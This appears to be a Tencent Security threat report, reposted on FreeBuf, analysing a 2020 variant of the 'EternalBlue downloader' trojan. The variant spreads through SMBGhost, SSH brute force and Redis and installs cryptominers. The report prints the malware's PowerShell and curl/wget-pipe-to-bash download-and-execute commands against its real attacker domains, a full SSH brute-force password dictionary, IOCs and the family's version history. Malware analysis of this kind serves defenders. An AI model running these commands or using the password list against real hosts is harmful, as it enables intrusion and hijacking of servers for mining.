一、背景
2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。
由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。使得木马针对Windows系统的攻击威力再次增强。
腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。
此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。
| 应用场景 | 安全产品 | 解决方案 |
|---|---|---|
| 威 胁 情 报 | 腾讯T-Sec 威胁情报云查服务 (SaaS) | 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。 可参考:https://cloud.tencent.com/product/tics |
| 腾讯T-Sec 高级威胁追溯系统 | 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts | |
| 云原生安全 防护 | 腾讯T-Sec 安全运营中心 (云SOC) | 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
| 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) | 1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html | |
| 云防火墙 (Cloud Firewall,CFW) | 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw |
|
| 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) | 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp | |
| 非云企业安全防护 | 腾讯T-Sec 高级威胁检测系统 (腾讯御界) | 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
| 腾讯T-Sec终端安全管理系统(御点) | 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html |
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
二、样本分析
攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:
powershell IEx(New-ObjectNet.WebClient).DownLoadString(”http[:]///t.amynx.com/smgho.jsp?0.8*%computername%”)
发起针对Linux服务器的攻击:
1、 利用SSH爆破
扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典:
“saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,””,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta”
爆破登陆成功后执行远程命令:
Src=ssho;(curl -fsSLhttp[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O-http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash
2、 利用Redis未授权访问漏洞
扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:export src=rdso;curl-fsSL t.amynx.com/ln/core.png?rdso|bash
SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:
1、 创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp
2、 创建crontab定时启动Linux平台挖矿木马/.Xll/xr
通过定时任务执行的a.asp首先会清除竞品挖矿木马:
然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击:
创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。
永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播:
| 漏洞利用 | 弱口令爆破 | 感染可移动设备 | 鱼叉攻击 |
|---|---|---|---|
| “永恒之蓝”漏洞利用MS17-010 | $IPC爆破 | 通过U盘、网络共享盘 | 以新冠肺炎等多种主题 |
| Lnk漏洞利用CVE-2017-8464 | SMB爆破 | 创建带漏洞lnk文件、js文件 | DOC漏洞文档、js文件诱饵 |
| Office漏洞利用CVE-2017-8570 | MS SQL爆破 | ||
| SMBGhost漏洞利用CVE-2020-0796 | RDP爆破 | ||
| Redis未授权访问漏洞(针对Linux) | SSH爆破(针对Linux) |
截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新功能列表如下:
| 2018年12月14日 | 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 |
|---|---|
| 2018年12月19日 | 下载之后的木马新增Powershell后门安装。 |
| 2019年1月9日 | 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
| 2019年1月24日 | 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 |
| 2019年1月25日 | 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 |
| 2019年2月10日 | 将攻击模块打包方式改为Pyinstaller。 |
| 2019年2月20日 | 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
| 2019年2月23日 | 攻击方法再次更新,新增MsSQL爆破攻击。 |
| 2019年2月25日 | 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
| 2019年3月6日 | 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 |
| 2019年3月8日 | 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 |
| 2019年3月14日 | 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 |
| 2019年3月28日 | 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 |
| 2019年4月3日 | 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 |
| 2019年7月19日 | 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 |
| 2019年10月9日 | 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 |
| 2020年2月12日 | 使用DGA域名,篡改hosts文件。 |
| 2020年4月3日 | 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 |
| 2020年4月17日 | 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 |
| 2020年5月21日 | 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 |
| 2020年6月10日 | 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 |
IOCs
Domain
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com
URL
http[:]//t.amynx.com/smgh.jsp
http[:]//t.amynx.com/a.jsp
http[:]//t.amynx.com/ln/a.asp
http[:]//t.amynx.com/ln/core.png
http[:]//d.ackng.com/if.bin
http[:]//d.ackng.com/smgh.bin
http[:]//d.ackng.com/ln/xr.zip
Md5
| if.bin | 99ecca08236f6cf766d7d8e2cc34eff6 |
|---|---|
| xr.zip | 2977084f9ce3e9e2d356adaf2b5bdcfd |
| core.png | 17703523f5137bc0755a7e4f133fc9d3 |
| a.asp | 8b0cb7a0760e022564465e50ce3271bb |
| smgh.bin | 5b3c44***3c7e592e416f68d3924620f |
参考链接:
永恒之蓝木马下载器发起“黑球”行动,新增SMBGhost漏洞检测能力
https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ
来源:freebuf.com 2020-06-12 17:53:55 by: 腾讯电脑管家
请登录后发表评论
注册